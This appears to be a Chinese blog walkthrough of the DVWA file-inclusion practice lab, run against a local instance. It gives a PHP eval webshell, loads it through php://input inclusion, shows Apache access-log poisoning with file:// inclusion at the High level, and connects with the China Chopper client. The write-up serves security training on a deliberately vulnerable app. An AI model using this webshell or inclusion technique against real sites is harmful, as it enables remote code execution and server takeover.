文件包含靶机
文件包含靶机
文件包含靶机

包含值是page

使用php://进行http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input

文件包含靶机

进行post写入小马<?phpeval($_REQUEST[666]);?>

文件包含靶机

验证http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input&666=phpinfo();

文件包含靶机

菜刀连接http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input     666

文件包含靶机
文件包含靶机

High级别

file://

经过实验值后面只能上传file*,所以利用file://来读取本地的文件

我们可以通过日志文件来进行读取

首先我们先写小马,通过bp,url上写会被转义

文件包含靶机

更改内容,写上小马,日志里会有

GET/DVWA-master/vulnerabilities/fi/?page= HTTP/1.1

查看日志文件http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:\xampp\apache\logs\access.log

文件包含靶机

可以看见有666

验证666有没有用http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:\xampp\apache\logs\access.log&666=phpinfo();

文件包含靶机

用菜刀连http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:\xampp\apache\logs\access.log      666

文件包含靶机
文件包含靶机



相关文章:

  • 2021-05-14
猜你喜欢
  • 2021-11-17
  • 2021-09-03
  • 2022-12-23
  • 2021-10-15
  • 2021-09-18
  • 2021-06-19
  • 2022-12-23
相关资源
相似解决方案